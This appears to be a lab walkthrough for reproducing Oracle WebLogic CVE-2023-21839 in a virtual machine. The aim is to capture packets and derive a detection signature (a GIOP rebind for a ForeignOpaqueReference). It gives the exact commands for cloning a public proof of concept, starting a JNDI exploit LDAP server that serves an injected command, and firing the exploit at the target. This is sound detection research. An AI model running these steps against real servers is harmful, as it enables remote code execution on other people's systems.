⭕ Emulating and Exploiting Oracle WebLogic Server for PCap Analysis (CVE-2023-21839)

Contents

• Why?
• References
• Virtual Machine (VM) Setup
  • OS (Windows 10)
  • Networking
  • Best Practices
• VM Environment (Target)
  • Java
  • Oracle WebLogic Server
    • Trouble Shooting
• Exploit Environment (Attacker)
  • Setup
  • Exploit and PCap
• Analysis
  • PCap

Why?

This should be informative regarding some WebLogic Server specifics if (when) the time comes to emulate it’s environment, but doubles as a reference for testing a PoC and generating some packets.

The purpose of this is not to explain how CVE-2023-21839 works, but rather how to identify it via web packet. This was a case where I, personally, found testing the PoC code, getting a packet, and looking at that to be more informative than just looking at the code itself.

TL;DR Lemme see the packets.

References

These are the materials I found specific to this exploit, I’ll provide other helpful links as I go along.

• NIST
• Writeup
• Java PoC
• Go PoC

Virtual Machine (VM) Setup

OS (Windows 10)

1. Install a hypervisor: I use VirtualBox
2. Download a Windows ISO
3. Install and Setup Windows
   • There are a ton of online tutorials on both step 1 and 2, however you’re probably going to want your Windows VM to have the following:
     1. 8000 MB base memory
     2. at least 2 cores (the more the better) → I used 6
     3. A Virtual Storage size of at least 40GB → I used 50GB
4. Take a snapshot of your fresh Windows VM

Networking

Now we need to set up a virtual network connection between our host (your computer running the hypervisor) and client (your new VM) machine.

1. Shutdown the VM if you haven’t already.
2. Make a new interface for connecting to the VM by going to the Host Network Manager: File → Host Network Manager
3. Click Create in the top left corner
   • This should make a Network titled vboxnet0 or something like that
4. Then click Enable for the DHCP Server option all the way to the right.

host_net_manager.png

1. Now we just need to enable our new adapter by going to Settings → Network → Adapter 2
2. Click Enable Network Adapter
3. Then for Attached to: choose Host-only Adapter
4. Make sure the Name of your adapter matches the one you’ve just created in the steps above.

gen_net_adapter_settings.png

Sanity check: you can make sure that everything setup alright in Ubuntu by running ifconfig, you should have a new NIC listed as vboxnet0, or whatever you chose to name it above.

Best Practices:

• Snapshot, then snapshot again. No, but seriously; take a lot of snapshots of your VM.

VM Environment (Target)

LFG! General environment is ready to go.

In this case the vulnerable version of Oracle WebLogic only seems to be vulnerable if compiled with an earlier jdk, in this case: jdk8u191 or earlier. I had little success with jdk8u191, so we’re compiling Oracle WebLogic with jdk8u181.

You will have to set up an account with Oracle first!

Java

1. In your Windows VM download and install Java SE Development Kit 8u181

jdk_8u181_download.png

2. Double click installed package to install

Oracle WebLogic Server

Effected versions include: 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0

I tested the exploit on 12.2.1.3.0.

1. Download Oracle WebLogic Server 12.2.1.3.0 (Generic)
2. Take a snapshot of your VM.
3. Download 7-zip (for Windows x64)
   • You’ll need this for unpacking the WebLogic Server jar file.
4. Take a snapshot of your VM.
5. This step through exercise is what I used, and what the writeup used:
   • https://blog.csdn.net/qq_41979593/article/details/123780213
     • Despite it not being in English, the step through can be intuited by the images.
6. Take a snapshot of your VM.

Trouble Shooting

I ended up having some trouble with just the first step of the Oracle Weblogic installer process: I couldn’t seem to get the .ng.cmd file to run because my machine couldn’t find a proper JAVA_HOME. Here’s how I worked around that:

1. Open Windows Command Prompt:
   • Home (Windows key) → Command Prompt → Run as Administrator
2. set JAVA_HOME=C:\Program Files\Java\jdk1.8.0_181 (or whatever your path is to your jdk)
   • NOTE: Despite it complaining about the jreLoc (jre location), it really wants the JDK 🙄

JAVA_HOME_set.png

3. Now you should be able to run .ng.cmd from your Command Prompt

run_ng_cmd.png

4. Return to step 3 from previous section.

Exploit Environment (Attacker)

You could go down the rabbit hole of Java dependencies (I tried), but easy mode = use the Go PoC!

Setup

1. Install Go
2. Clone the PoC repo (also attached below).

git clone https://github.com/4ra1n/CVE-2023-21839

4ra1n_CVE-2023-21839.zip

3. Install the JNDI Exploit Kit
   • snapshot attached here: JNDI-Exploit-Kit-SNAPSHOT.zip
4. Install Java
5. Install Wireshark
   • Under most deb distros you should be able to just run: sudo apt install wireshark

Exploit and PCap

1. Start your target WebLogic Server
   1. Home (Windows key) → Command Prompt → Run as Administrator
   2. Run startWebLogic.cmd typically found at C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain\startWebLogic.cmd
      • NOTE: You can check Target IP in Windows VM by running ipconfig in the Command Prompt
2. Start Wireshark (you may have to be admin)
3. Begin monitoring on the adapter we made earlier: in my case vboxnet0
4. Start JNDI-Exploit-Kit

java -jar JNDI-Exploit-Kit-1.0-SNAPSHOT-all.jar -C <command> -L <your locally hosted ldap server>:<port>

ex) java -jar JNDI-Exploit-Kit-1.0-SNAPSHOT-all.jar -C calc -L 192.168.1.10:1389

Over simplified explenation of what this is doing is serving an ldap server that has our command (calc) ready for injection

5. Build the PoC

cd cmd; go build -o poc

6. Run the PoC

./poc -ip <target ip> -port <target port (7001)> -ldap <your ldap server>

exploit_screen_cap.png

7. Celebrate the calculator 🧮
8. Stop Wireshark (it should have your PCap now ready for analysis!)

Analysis

We can get a general understanding of what to look for, and how the exploit works via the writeup. In this case we know that our payload is going to target the weblogic IIOP/T3 protocol, and is also going to make a request for a ForeignOpaqueReference object. Taking a look at the PoC code can give us a better idea of how the resulting payload may actually appear going over the wire, but with limited experience looking at these kinds of packets it can be pretty hard to know for sure. As mentioned earlier, this is why we want to test the PoC, and get PCap from it.

PCap

Here’s the sample from when I ran the exploit:

pcap.zip

Sure enough, the signature details (ForeignOpaqueReference, and a call to GIOP) can be seen in it’s contents. Specifically, a rebind request for a Transparent Remote Method Invocation (TRMI) is made over GIOP for a ForeignOpaqueReference. This kind of activity is unique enough that a reliable signature could be made based on this information, and now we know what it looks like on the wire!

pcap_screenshot.png